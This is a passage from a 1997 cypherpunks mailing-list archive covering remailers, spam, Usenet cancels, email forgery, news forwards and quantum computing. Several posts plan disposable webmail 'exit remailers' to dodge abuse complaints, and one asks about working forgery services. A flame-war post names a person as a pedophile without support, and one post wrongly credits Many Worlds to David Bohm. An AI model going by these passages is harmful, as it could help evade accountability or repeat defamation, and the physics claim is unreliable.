me. An Intel Inside logo may (or may not!) do the same. Even SATs and
GMATs are rating systems of a sort, for they tell a prospective employer
or college something about me. Then there's TRUSTe. 

Third party rating systems are nothing more than the formalization of
gossip, which has lubricated the social wheels of every society that has
ever existed.

So I suggest one should not oppose third party rating systems in general
but instantiations of these systems in particular. RSACi is certainly one
of those. 

-Declan







From mark at unicorn.com  Fri Aug  8 01:20:13 1997
From: mark at unicorn.com (Mark Grant)
Date: Fri, 8 Aug 1997 16:20:13 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
Message-ID: 




On Thu, 31 Jul 1997, Jeff Barber wrote:

> Network bandwidth used for the purpose of email transport,
> even with increased spamming factored in, is simply too low to justify
> charging much for it.  It will still be *way* cheaper than surface mail.

Yep; which is why it's a bad idea. We don't need net postage to pay the
ISP, we need net postage to pay *me* to read the spam. Making them pay
$0.0001 to send a message will have little impact, but making them pay me
$1 to read it certainly will (i.e. my filters could block all potential
spam unless it includes a dollar of ecash). I have no problem with
spammers subsidising my Net access, I just object to having to pay for
their crap. 

> So unless the percentage of people who delete it instantly, sight-unseen,
> is higher than I suspect or new tools make it easy to filter out all
> spam, it's going to remain economically advantageous for the spammers
> to target broadly.

I've seen one spam in the last two weeks. The other 100k or so was blocked
by my filters; I'm almost starting to miss it. When you actually sit down
and analyse the spam most of it has so many obvious 'spam-tags' that you
can easily work out a set of rules to catch them. The only disadvantage is
that on a couple of occasions it's caught mail from friends when they sent
it through a site which appends advertising rather than from their normal
address. 

	Mark






From iverson at usa.net  Fri Aug  8 01:22:20 1997
From: iverson at usa.net (Casey Iverson)
Date: Fri, 8 Aug 1997 16:22:20 +0800
Subject: Qualcomm employee attacks the remailers
Message-ID: <3.0.16.19691231190000.4a57c97e@pop.netaddress.com>



At 10:37 PM 8/6/97 EDT, The Anti American, KGB loving  bucket of animal
dung and human excrement :
 Dr.Dimitri Vulis KOTM wrote the following, and again the master of
disinformation and  harassing e-mail, points
out that others are targeting him for the abuses that he is famous for.

Are we expected to have sympathy for this dick brain?


>
>Paul Pomes  writes:
>
>> |Paul Pomes sends me harrassing e-mail and quotes more obscenities from
>> |the anonymous remailers:
>
>such as:
>
>]I take this all to mean that you are Master Cocksucker Dimwit Vulis?
>
>> As you posted the obscenities in the first place I fail to understand your
>> objections.
>
>
>Lie from Pomes: I never in my life sent anything to this motherfucker.
>
>Another lie from Pomes: a few days ago the motherfucker wrote:
>
>]Subject: Re: Entrust Technologies's Solo - free download
>]From: Paul Pomes 
>]Organization: Qualcomm, Inc.
>]To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>]Cc: freedom-knights at jetcafe.org
>]Date: Wed, 30 Jul 1997 09:13:52 -0700
>]Message-Id: <9502.870279232 at zelkova.qualcomm.com>
>]Sender: ppomes at Qualcomm.com
>]
>]At 9:22 EDT on Wednesday, July 30, 1997, Dr.Dimitri Vulis KOTM wrote:
>]
>]|I ask everyone on these two forums to inform Northern Telecom Forgers /
>]|Bell North Forgery Research / Entrust that we will boycott their
>]|"security" products as long they continue to employ the child-molesting
>]|pedophile Chris R. Lewis - the biggest forger on Usenet.
>]
>]Sorry, I'm afraid that honor belongs to you, Dimi.  What I will do is
>]killfile you as also the biggest un-cultured twit on Usenet.  High honors
>]of a sort.
>]
>]/pbp
>
>Clearly Pomes lied about having killfiled me.
>
>Pomes harrasses anonymous remailer operators: he has been complaining to
>Jeff Berches's employer and upstream, contributing to his decision
>to shut down the cajones remailer:
>
>]To: abuse at hotwired.com, abuse at bbnplanet.net, remailer-admin at cajones.com
>]        jeff at hotbox.com, ops at bbnplanet.com, toxic at content.org,
>]        dgaudet-djg20 at arctic.org
>]From: Paul Pomes 
>
>Tim Skirvin condones and supports net-abuse by Net.Scum like Pomes,
>Hannigan, and Varshavchik.
>
>Please tell Qualcomm what you think about their employee attacking
>the anonymous remailers.
>
>
>






From enoch at zipcon.net  Fri Aug  8 01:30:25 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Fri, 8 Aug 1997 16:30:25 +0800
Subject: Exit Remailer Suggestion
Message-ID: <19970807192254.40.qmail@zipcon.net>



Someone wrote:

 > What about AOL disks?  We need shorter lived, disposable
 > remailers as exit remailers...  Let them take the heat,
 > while the real remailers walk.  Lets see a series of
 > "exitman" remailers.  Exitman remailers are walking targets
 > left to fend for themselves as long as they may.

We already have a preconfigured set of exit remailers.  They have
names like "hotmail", "rocketmail", etc...  These are the
web-based email services which will instantly create accounts for
anyone, no questions asked or authentication required, and permit
access to these accounts with the chosen password from anywhere
on the Net.  You can even chain them, using an account on one to
apply for an instant account on another, leaving few bread crumbs
for anyone to follow.

Most of these services don't care, don't log, and rarely read
their email to abuse at . Even if pressure does cause an occasional
account to be deleted, you can easily create ten more in as many
seconds.

By reconfiguring current remailers to use a public Email service
as the last link in the chain, we tap a potentially infinite
supply of disposable accounts, on advertising-supported service
providers with skins as thick as those of the bulk emailers.

Sounds like a plan to me.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From declan at pathfinder.com  Fri Aug  8 01:47:36 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Fri, 8 Aug 1997 16:47:36 +0800
Subject: Gore on "information standard," from wire service reports
Message-ID: 



@TEXT
	gore-urban-league 6thadd

GORE/URBAN LEAGUE PAGE 10 08/06/97 .STX x x x high. You know, forget about the gold standard; we're on the information standard. There's $1-1/2 trillion in the global economy sloshing around every single day, flowing toward those nations that make hard choices based on real numbers and get away from illusionary policies based on secondhand smoke and rear-view mirrors. By making the tough choices and investing more in our priorities for the future, while at the same time steadily reducing the budget deficit, we are keeping interest rates down and drawing investment capital to the right places in the United States of America. President Clinton and I know that while a strong and growing national economy is job number one, and while we are proud of the progress that has been made, we know that it is only a start, and much more needs to be done. We know that it's also not enough, because while we must improve the track, we must also make sure that everyone has the opportunity to get to the starting gate. That's especially important today, because we are entering a new economy, one that is not just better and stronger than the old one, but one that is very different as well, in fundamentally new ways. It is an economy driven by information and technology. It is an economy that depends less on the size of our factories than it does on the skills and creativity of our people. It is an economy that is linked to the global marketplace by phone, fax, and computer cable. It is an economy that is zapping dollars and data around the world every moment at the speed of light. That's something new. We all know that. We see it in our daily lives. We experience it when we walk into a business establishment. We see it in our own work. And if we prepare for this new economy, this new world, in the right way, then this new economy can be the most empowering and inclusive economy that the United States of America has ever known. In an economy where goods and services are increasingly traded along and across the information superhighway, a simple connection to the Internet can transform an isolated urban community into a thriving economic center. In an economy where companies cannot afford not to hire and promote the best-educated, best-trained, best-skilled employees, the right kind of education can indeed help to crack the glass ceiling and break through the barriers of prejudice and hatred, and get rid of the residue of that hatefulness from history in an economy. .ETX GORE/URBAN LEAGUE PAGE 11 08/06/97 .STX MORE .ETX Aug 06, 1997 12:04 ET .EOF From aba at dcs.ex.ac.uk Fri Aug 8 01:54:51 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Fri, 8 Aug 1997 16:54:51 +0800 Subject: disposable remailers (was Re: Eternity Uncensorable?) In-Reply-To: Message-ID: <199708080223.DAA01636@server.test.net> Andy Dustman > > Wasn't there an email forgery web page around for a while. The idea > > was that you filled in the details of who you wanted to send to, what > > address you wanted it to appear you had sent it from, and paste your > > message in this form box. It did some kind of crude sendmail forgery > > for you. > > Hmmm. Someone has recently been forging mail to appear to be from cracker > through something like this (very bad forgery, headers are all wrong). I said "wasn't there", as in past tense. It got nuked years ago now (literally) because of complaints. When I looked at the page it still had the text but a note that it was disabled, and why. Just wandering if anyone knew if anyone else had set up something more recently that still worked. > > You'd not want to use the same public access account regularly. > > I'm not thinking of an account so much as maybe a PC in a university > computer cluster. Pick one and go. At a big university there should be > several clusters around campus. You might get away with that for a pretty long time, I guess. > > I think the connecting to the web based interface of one of those free > > web gateways via www.anonymizer.com web based interface has potential. > > It does, but I know The Anonymizer blocks some sites, at their request. Right. So there is one anonymizer, and if we make a big game of using this method, Lance will get threats, and at best be asked to block them. We need something more distributed. That network of anonymizers isn't here yet. > > How much trouble can you get in with ISPs for forging email? Do they > > care? > > Mindspring cares. My ISP was absorbed by them about two weeks after I > signed up. They say in their terms of service that impersonating someone > else is forbidden, but they specifically allow the use of anonymous > remailers and nicknames. I assume this means forging is frowned upon, > unless you are impersonating someone who doesn't exist, I guess. Well I was thinking along the lines of: bubba at dev.null type addresses yes. You ain't imitating anyone there. I wonder if they frown on generating non-replyable email addresses though. Non-existant domains. I speculated in the previous post that perhaps the habit of using: gizmo at netcom.com.NOSPAM might make ISPs accustomed to having people use non-replyable email address all the time. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Net crime begs questions: Who to call? By [38]Janet Kornblum August 5, 1997, 8:00 p.m. PT On June 10, out of the blue, Bruce Hovland's business phone started ringing off the hook. The people calling weren't happy. They all demanded to know the same thing: How did they get on his mailing list? They also insisted, not always nicely, that he not send them the pornography he had apparently promised them in an email. They didn't order any porn, they said. Hovland doesn't send out pornography for a living, and he hadn't sent angry callers any email, either. In fact, Hovland is a Florida businessman who rents out an inland marina and markets various products like construction materials, none of which have anything to do with porn, email, or the Internet. He surfs for educational reasons and sometimes sends mail, but that's about it. According to Hovland, he is a victim of a crime. Someone--he thinks he knows who--sent out an email to possibly thousands of people telling them that "in 48 hours your credit card will be charged $184.80" for three adult videos. Recipients were then told they could not reply by email but "If we do not hear from you within 48 hours, we will assume everything is correct and make the charge to your card." The email supplied contact numbers, all belonging to Hovland. Perhaps adding insult to injury, the email said "you may call collect you if you wish." Hovland estimates there were thousands of calls from everywhere. "I've been pretty much threatened from all corners of the world," he said. He added he reported the incident to the local sheriff's department and to the [39]FBI and Secret Service. "I think I've been internationally defamed. I'm known worldwide as a porn dealer." But that's not even the part that bothers him the most: Hovland said this incident alerted him to the fact that there's no place to deal specifically with Internet crimes. Now, he wants to do something about it. "I believe that the entity, the Internet, is accountable. The freedom of it is what makes it so great, but they need to police it. They need to have 911 [for the] Internet." He's already gotten support from one person: Philip Kirschner, a law student who received the spam and called Hovland to cancel the order. Kirschner is helping to mount a campaign for legislation or some sort of task force. Hovland said he and a friend started tracing the email spam. With some luck, he explained, he figured out that it came from a wanted man who had fled the country and left his boat and car at Hovland's marina without paying rent. Hovland eventually sold the goods, but catching the alleged culprit is a different story; suing him would be nearly impossible. Hovland said he's lost two weeks worth of work. But he noted it could have been a lot worse: Someone could have directed the spam victims to a hospital switchboard or some other business that counts on their phones to help save lives. "Anyone can be a victim, whether you're an Internet user or not. If a guy can be in a foreign country and pinpoint his harassment and maybe be unprosecutable, there's a major problem. International harassment via the Internet can be an extremely volatile thing. It's a lot more serious than some fat white guy in Florida getting harassed." Now he hopes the spam and his experience will lead to something bigger, maybe even a movement that speaks for the average person who winds up being a victim of a Net crime. "A regular businessman in this society can be victimized at the point of a mouse," Hovland said. "They could literally put me out of business if they continued. It's bizarre." related news stories • [40]CNET Special Feature: Dark side of the Web July 18, 1997 • [41]Laws of cyberland April 25, 1997 • [42]CNET Special Report: Crime on the Net February 7, 1997 • [43]States mull harassment laws January 31, 1997 • [44]States fight harassment December 16, 1996 • [45]FBI in Net porn probe December 12, 1996 38. mailto:janetk at cnet.com 39. http://www.fbi.gov/ 40. http://www.news.com/News/Item/0,4,12590,00.html 41. http://www.news.com/SpecialFeatures/0,5,10040,00.html 42. http://www.news.com/News/Item/0,4,7754,00.html 43. http://www.news.com/News/Item/0,4,7550,00.html 44. http://www.news.com/News/Item/0,4,6262,00.html 45. http://www.news.com/News/Item/0,4,6157,00.html From ravage at ssz.com Fri Aug 8 02:10:53 1997 From: ravage at ssz.com (Jim Choate) Date: Fri, 8 Aug 1997 17:10:53 +0800 Subject: Shor's Algorithms: Mad, Bad and Dangerous (fwd) Message-ID: <199708080232.VAA08939@einstein.ssz.com> Forwarded message: > Date: Thu, 07 Aug 1997 21:12:15 -0400 > From: John Young > Subject: Shor's Algorithms: Mad, Bad and Dangerous > >From a WSJ nook review today of "The Fabirc of Reality," > by David Deutsch (Allan lane, 390 pp., $29.95): > > Using something called "Shor's algorithm," a quantum > computer can factor giant numbers and thereby break > secret codes that no conventional computer could touch. > > The only way it could do this, Mr Deutsch argues, is by > distributing its operations over many parallel universes. > "To those who cling to a single-universe world-view," > he writes with evident asperity," I issue the challenge: > *explain how Shor's algorithms works.*" The Many Worlds Hypothesis was developed by David Bohm and is an alternate way of looking at the Uncertaintly Principle, which gets its origin from the collapse of wave functions used to describe the potential states of a wave. The advantage of using a Many Worlds Hypothesis is that it allows you to do away with Bohms, Schroedinger, Einstein, etc. objections to the standard model, God playing with dice. >From an existential perspective it is simply another way of viewing the Hamiltonian of the wave equation. In short the Many World theory says that all possible outcomes are available in parallel, you only get to experience one of them. The standard model says the Hamiltonian collapses from its n-element state to a single valued state at the time of measurement (ie the system is in no state unless measured). Which was Schroedingers explicit complaint, in his cat model the question he was asking (that gets dropped by modern physicist because it is so subversive to the Standard Model) is "Doesn't the cat know what state it is in?". The implicit (and never stated) assumption in the Standard Model is that a particle's state is defined by the particles and their interactions that surround it AND the particle is comletely unaware of it. Which brings questions like "How does the electron know to be in the S1 orbital if it doesn't have any way of knowing its energy state?". This is especialy problematic since a base assumption is that the only way to effect an electron is through a photon. A good extension is consider the insanity of the Moon disappearing when you aren't looking at it. Look at the Moon and the tides appear, look away from the Moon and the tides go away... > Combining the many-universes notion with quantum probablity, You can't combine them, the whole point of the Many Worlds theory is to explicity eliminate quantum probability and bring the mechanism into the deterministic model used at higher levels of scale (ie Newtonian Mechanics). The goal is to build a system that is consistent across questions of scale. > and adding elements of Darwinism and Karl Popper's theory > of knowledge, Mr. Deutsch apsires to nothing less than a > complete understanding of "the fabric of reality." Arrogant > in tone and marred by leaps of logic, his book nonetheless > bristles with subversive insights about virutal reality, > time travel, mathematical certainty and free will. > Intellectually speaking, Mr. Deutsch is mad, bad and > dangerous to know. Sounds like a bunch of wishfull thinking and serious misunderstanding of Bohm, Schroedinger, etc.'s work. ____________________________________________________________________ | | | Participation requires more than just bitching! | | | | _____ The Armadillo Group | | ,::////;::-. Austin, Tx. USA | | /:'///// ``::>/|/ http:// www.ssz.com/ | | .', |||| `/( e\ | | -====~~mm-'`-```-mm --'- Jim Choate | | ravage at ssz.com | | 512-451-7087 | |____________________________________________________________________| From frogfarm at yakko.cs.wmich.edu Fri Aug 8 02:29:26 1997 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 8 Aug 1997 17:29:26 +0800 Subject: arg8797.htm Message-ID: <199708080847.EAA31851@yakko.cs.wmich.edu> News Story Thursday August 7, 1997 ______________________________________________________________________ [1]Back to Tech News [2][LINK] Government of Argentine not happy with the Net [3]Ken Rutkowski Tech Talk News Argentina's coordinator for the Secretary of Communications has announced government plans to intervene in Internet service provision within the country in order to establish standards of cost and quality. "We are very dissatisfied with the degree of Internet diffusion," says Alejandro Garro. "The government is worried about the low level of penetration that the service has in Argentina both geographically and in terms of income classes." Garro is critical of the high cost of the service and the low number of Internet subscribers, estimated to around 75,000. He blames the low level of investment by national service providers and has announced that a public inquiry will deal with the issue. However, the Secretary of Communications official maintains that no government restrictions will be applied to the political, social, religious or educational content of the Internet, as has recently happened in the U.S. "In the government resolutions which paved the way for the Internet into Argentina, clear reference is made that there exists no way in which its contents can be regulated," Garro says. South America's current statistics shows Argentina's internet growth to be the second to Brazil. [4]Listen To Today's World Technology Round Up ________________________________________________________ [ [5]Welcome] [ [6]Mailing List ] [ [7]Inside Sources ] [ [8]What's New] [ [9]Cool Links ] [ [10]Audio Archives] References 1. http://www.ttalk.com/news/index1.html 2. http://www.ttalk.com/news/index1.html 3. mailto:ken at ttalk.com 4. http://audio.wirelesstcp.net/ttalkra/tech.ram 5. http://www.ttalk.com/ 6. http://www.ttalk.com/mail_list.htm 7. http://www.ttalk.com/inside_sources.htm 8. http://www.ttalk.com/whatsnew.htm 9. http://www.ttalk.com/links.htm 10. http://www.audionet.com/shows/techtalk/index.html#archive From jbaber at mi.leeds.ac.uk Fri Aug 8 02:32:24 1997 From: jbaber at mi.leeds.ac.uk (jbaber at mi.leeds.ac.uk) Date: Fri, 8 Aug 1997 17:32:24 +0800 Subject: REPOST : Un-forgeable Cancels Message-ID: <12867.9708080920@misun2.mi.leeds.ac.uk> I don't think this got through the first time so I am resending it...... -------------------------------------------------------------------------- OK so this has probably been thought of before or has some horrible problem that I have missed but how's about this as a method of verifying that cancels have actually come from the author of a message. I have seen a number of solutions that use various signature algorythms to check that the cancel has been sent by the original author of the message. However these require that the news program has access to the public key of the author in order to verify the signature before honouring the cancel. Since there are millions of authors on usenet I believe that this is impractical and, not suprisingly, key management again turns out to be a major problem which I believe can be solved using one way hash functions. 1 When any message is sent a hash X is calculated as : X = HASH(Mid,S) where Mid is the Message ID S is a secret controlled by the author (eg a pass phrase) 2 The hash value Y is then calculated such that: Y = HASH(X) = HASH(HASH(Mid,S)) 3 The value calculated for Y is then included with the message as X-Cancel-Ref: Y This does assume that message IDs are available by the news program and are not allocated after sending. If this is not the case then it would be necessary to use other header information to calculate the hash such as the date/time and subject, or to store some kind of key at the authors end in order to reference the message (although in this case X may as well just be generated randomly and stored). If the user later decided that the message should be canceled he must re-calculate X using the message ID and his pass phrase and include this value in the cancel : X-Cancel-Key: X News programs can then be set to check that a valid value of X such that HASH(X)=Y has been received before honouring the cancel. Note - I realise that this does not stop anyone who can change the X-Cancel-Ref header from canceling the message but if they can do that they can probably just delete the message anyway. Any comments/glareing weaknesses that I have missed? Jon http://chem.leeds.ac.uk/ICAMS/people/jon/ From jya at pipeline.com Fri Aug 8 02:43:57 1997 From: jya at pipeline.com (John Young) Date: Fri, 8 Aug 1997 17:43:57 +0800 Subject: E-Commerce Report Message-ID: <1.5.4.32.19970808020729.00746f28@pop.pipeline.com> 7 August 1997, Business Wire: Businesses will spend $31 billion on Electronic Commerce-related software, hardware, products and services by the year 2001, according to Bill Burnham, senior research analyst at Piper Jaffray Inc. That's one of the conclusions Burnham draws in "The Electronic Commerce Report" released today. The first comprehensive study of the rapidly emerging Electronic Commerce industry, Burnham's report outlines how this spending threatens to topple many of the existing structures underpinning the economy. The 250-page document provides an in-depth examination of five separate areas of the Electronic Commerce industry: Internet Security, Electronic Payments, Financial Software, Business Commerce Software and Commerce Content (Internet-based retailing). The report includes projections for revenue growth, size of the electronic bill payment industry, number of electronic bill presentments and the number of commerce-oriented Internet sites. Some of the report's most significant findings include: -- Implementation of the Secure Electronic Transaction (SET) standard for Internet credit card transactions may be delayed due to compatibility and processing problems; -- Increasing concentration in the electronic payment sector will lead to the "death" of the current payment system. The Internet increasingly will be used in lieu of payment networks currently run by organizations such as Visa, Mastercard and the Federal Reserve; -- An estimated $228 billion in goods and services will be bought and paid for over the Internet in 2001. The consumer-to- business market will account for $26 billion in purchases while the business-to-business market will account for $202 billion in purchases - eight times larger than the consumer market; -- The Electronic Data Interchange (EDI) industry faces an increasing challenge from a new Internet-based technology called Direct Data Internet (DDI). DDI eventually will battle with the EDI industry for control of the business-to-business market on the Internet; -- Intelligent Agents -- software programs that automatically shop on behalf of consumers -- will eliminate the advantage enjoyed by firms with well known consumer brands; -- Banks and technology firms such as Microsoft and Intuit are heading towards a confrontation over the creation of so-called "Integrator" sites on the Internet. These sites are destined to become a consumers' gateway to the Electronic Commerce industry; -- The Internet security industry will grow from $525 million to $2.7 billion in the next five years. However, this industry will face constant threats from large technology firms such as Microsoft and Cisco Systems, who could destroy the industry by embedding security features into their products. "Too many people have confined the concept of Electronic Commerce to selling trinkets over the Internet," Burnham said. "But Electronic Commerce goes much deeper than that. Over the next few years we will witness a series of battles between firms that hang on to the traditional ways of doing business and those that embrace and capitalize on the rise of Electronic Commerce." Copies of a six-page summary or the entire 250-page report are available upon request. For more information, contact Piper Jaffray at (612) 342-5540. ----- From aba at dcs.ex.ac.uk Fri Aug 8 02:49:06 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Fri, 8 Aug 1997 17:49:06 +0800 Subject: disposable remailers (was Re: Eternity Uncensorable?) In-Reply-To: Message-ID: <199708072250.XAA05978@server.test.net> Andy Dustman writes: > On Thu, 7 Aug 1997, Adam Back wrote: > > > You know how middleman operators work... they always, always send > > mail via another remailer and never deliver mail to a user. (I'm not > > sure if they detect this by looking to see if the address is on the > > remailer list, or just always add an extra hop?) > > I think by definition a middleman always chains through one or more > additional remailers. When I ran dustbin, it was a "smart middleman", > i.e., if the recipient was a known remailer, it wouldn't bother to chain > (remailers rarely complain), otherwise it would chain through a single > remailer. OK, so as you're the first person to implement a smart middleman I guess that defines the terminology :-) middleman "always adds another hop through a random remailer" smart middleman "posts through remailer when asked to deliver to anybody other than a known remailer" Wasn't there for a time a hidden middleman. That is a middleman remailer who's published address was a nym account on a nymserver? That'd be a "hidden middleman". > An even smarter middleman would detect PGP messages and deliver those > directly to end recipients, since those people are unlikely to complain > about anonymous mail, and chain if the message was plaintext. The risk > involved with this type of middleman operation should be rather small. Yep. Dimitri suggested on cypherpunks in the last round of discussion of this sort of thing another variation on that -- that you could deliver the mail if the person had a PGP public key on the keyservers -- whether the email was encrypted or not. On the assumption that people who use PGP would be unlikley to complain of anonymous mail. He also suggested beefing up keyserver submission checks (there are none right now) so that you need a replyable address to submit a key, otherwise the remailer-baiter just posts a key generated with their "victim's" email address on it prior to sending to them. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708080936.KAA01816@server.test.net> Mike Duvos writes: > Someone wrote: (That someone was me). > > What about AOL disks? We need shorter lived, disposable > > remailers as exit remailers... Let them take the heat, > > while the real remailers walk. Lets see a series of > > "exitman" remailers. Exitman remailers are walking targets > > left to fend for themselves as long as they may. > > By reconfiguring current remailers to use a public Email service > as the last link in the chain, we tap a potentially infinite > supply of disposable accounts, on advertising-supported service > providers with skins as thick as those of the bulk emailers. > > Sounds like a plan to me. OK, lets _do_ it! Sounds much easier and less risky than relying on a recreational cracker to provide a stream of short lived remailers as I was suggesting. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708080956.KAA01839@server.test.net> Tim May writes: > [...] > Nor are delivery services required to "know their customer" or to > have ironclad proof of where a package originated. (Hell, even the > U.S. Postal Service allows mail with no valid return address, and > this was my experience in Europe as well.) Because there is a from address people get picky that it ought to contain a valid return address. Many ISPs apparently have policies which state that you aren't allowed to do SMTP forgeries. Paper mail doesn't have this expectation. Pity the people who designed SMTP didn't leave this one out -- at this point it would be difficult to get a From field added. They could have followed the paper mail norm and left it to the user to include (or not) whatever contact info he wanted. Of course you can see the natural convenience of a From, or Replyto field, which is why it's there. Now that the from field is there, it'll be even harder to remove from implementations and protocols... basically impossible. Still the spam counter-measure which many people are starting to use of forging headers to avoid getting their email snarfed helps reduce the expectation that the From field will contain anything useful. However that isn't the only problem... the series of Received headers allow those with the know how to recognise and narrow down where forged mail came from. But usually only to a mail hub where it was injected at best, and then often only tentative with out collaboration with involved sites. Course Received: headers have their uses also, to debug sendmail configs, and work out where mail is going. Still would have been nice if the feature was only included in the SMTP delivery stuff when debugging mode was turned on. > The "From:" field in e-mail is not to be confused with the "originator" > (whatever that may be). > > Not even the U.S. courts are so dumb as to accept the claim that a package > delivered by the U.S. Postal Servie or by UPS means that Joe Deliveryman is > the "sender." > > When this "From:" thing eventually gets to a court, I expect this > distinction will be obvious to all. > > Remailers are just middlemen in a delivery process. I hope you're right. I still think laws against spam are the wrong approach, even if the courts declare remailers as delivery mechanisms only. "Write code, not Laws." (Btw who's quote is that? I like it and wanted to quote it in an article on Eternity.) Re spam problems and writing code and not laws, hashcash was my best attempt: http://www.dcs.ex.ac.uk/~aba/hashcash/ However coding is not the only problem, the other is getting people to use stuff. Advertising, subscribing to appropriate newsgroups, going to IETF meetings, deployment wins, but stuff dies due to little investment in advocacy. I haven't got the energy or resources to advertise the above. I reckon you could make nearly a full time job just reading and corresponding with people on enough news admin groups and mailing lists to get your message across to enough people to even begin to make an impact. I wrote the eternity service implementation 3 months ago, released source code: no interest. (Bar a few email messages saying "cool"). No demonstration system was the problem. Mike Duvos provided a demonstration system last week when I reposted the announce due to his discussing similar ideas, and poof: 4 eternity servers, wired article, another request to write an article for some magazine, offers to give talks at US universities. Wew. I also reckon, though obviously this is difficult to measure, that the few hours invested in producing the flashy title bar graphics with a more professional take off of the cypherpunks rose on field of entropy logo and pirate skull with crossed-swords added more to the appeal of the service than adding more features. My normal HTML coding style of drab grey with no graphics at all just doesn't look appealing. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708081127.MAA00177@server.test.net> Jon Baber writes: > 1 When any message is sent a hash X is calculated as : > > X = HASH(Mid,S) > > where Mid is the Message ID > S is a secret controlled by the author (eg a pass phrase) > > 2 The hash value Y is then calculated such that: > > Y = HASH(X) = HASH(HASH(Mid,S)) > > Any comments/glareing weaknesses that I have missed? Sounds good to me. I thought there was someone doing something like this with hashes. But then I never really looked into any of the systems. What does Greg Rose's PGPMoose do? (One presumes it involves PGP sigs?) > This does assume that message IDs are available by the news program > and are not allocated after sending. If this is not the case then it > would be necessary to use other header information to calculate the > hash such as the date/time and subject, or to store some kind of key > at the authors end in order to reference the message (although in > this case X may as well just be generated randomly and stored). I think you don't even need this much uniqueness of hashing material... Say you just chose a random R and store it in ~/.news-preimage, and HASH( R ) in ~/.news-image. Now you post all of your posts with HASH( R ) in a header as you are suggesting. Now if you didn't want to be coerced in to cancelling your own posts you just remove .news-preimage instantly. You have to update your preimage for each cancel you do, but how many cancels do people do anyway? (Not many for their own benefit I reckon). This is a low security application, and ease of use over user typed passwords will win I think. Conceivably you could cope with the above by making .news-image readable to the news system on your local net news service. This could transparently do the job without needing to update any clients -- only an INN patch required. Sounds like a phun project for someone. Issueing cancels would be more manual, but you could easily knock up a perl script to instruct the NNTP server to do that. (Or windows program, or whatever). If you really wanted to integrate cancels without updating clients, for those that support them you'd have to give the NNTP news server access to your preimage, R. Not sure this is a good idea, as now your ISP can be coerced into cancelling your message for you without your cooperation. Course all these problems go away if you do update clients, but it's usually nice to offer an easy interim migration path, else no-one will use it. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708081140.MAA00231@server.test.net> Damage Justice forwards: > > [article describing a spam-baiting case with an unsuspecting > business man as victim. Some spammer sends spam purportedly from > business man... business man gets lots of harrasing > calls... business man calls for `accountability'... `government must > do something'] I think this article lends credence to my recent arguments that control of spam will lead to control of remailers. Kent has been arguing against these suggestions on the grounds that I am being unrealistic or something. More recently Tim expressed optimism that attacks on remailers via this route be struck down by courts. Now the spammers aren't using remailers that much at the moment. Anti-spam laws will make them do so (or make them use off-shore accounts). When an incident like this happens via remailers, there will be similar calls for `accountability' on the net, and for `government to do something about the problem'. If you're paranoid, you'll consider it likely that the mega-spam bait through the remailer that is used as the show case will actually have originated from a Fed Stooge. (A la US Postal Inspector being originator of Kiddie Porn that got the Thomases locked up in the adult BBS case). I don't spell out what a call to arms by USG on `accountability on the net' is likely to spells for remailers, surely. (Remailer user escrow? Banned remailers? Illegality of using remailers even in other countries? Legislation calling for US ISPs to block non US remailers?) You should be worried, and you should be saying no to spam laws (or any laws about net content). Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <199708081138.NAA07099@basement.replay.com> > > How about if it is an employee of yours, using your computer > > equipment, that sent the message, in explict contradition to your > > companies stated policy? > > Use a retraction server (David's project) I wonder if there is a problem of inconsistent levels in this debate... At one level, many people on this list are in favour of infrastructure such as Usenet and the Web carrying all information without filtering with respect to content, to avoid censorship, oppression and so on. At another level, almost everybody has personal preferences as to what they consider worthwhile information, what they want to read, what they want their children/employees to read, and what they want their privately-owned hardware to be used to carry. At the content-free level, cancels are information just like anything else, merely a stream of octets. By definition, they _can't_ be morally wrong at that amoral level where we talk only about whether store-and-forward works properly or not. Cancels, "forged" or otherwise are just a tool, just bytes. Within a particular value system, you might agree or disagree with a particular cancel, or with the idea in general. It's easy to configure a news server or reader to conform to your preferences, just people who hate spam are free to ignore it. At this level, you can make judgements as to which uses of that tool are justifiable. (Cancels by sysadmins, anti-spammers, spammers, system owners, governments, parents, copyright lawyers or nobody at all.) ::Boots "I'm sorry but I just don't consider 'because he's a pedophile' to be a convincing argument." From randerso at ece.eng.wayne.edu Fri Aug 8 06:01:15 1997 From: randerso at ece.eng.wayne.edu (Ryan Anderson) Date: Fri, 8 Aug 1997 21:01:15 +0800 Subject: "Voluntary Censorship" vs. Govt Legislation In-Reply-To: <19970808062547.28652.qmail@hotmail.com> Message-ID: On Thu, 7 Aug 1997, John Smith wrote: > >The second thing, and most important, is that web search 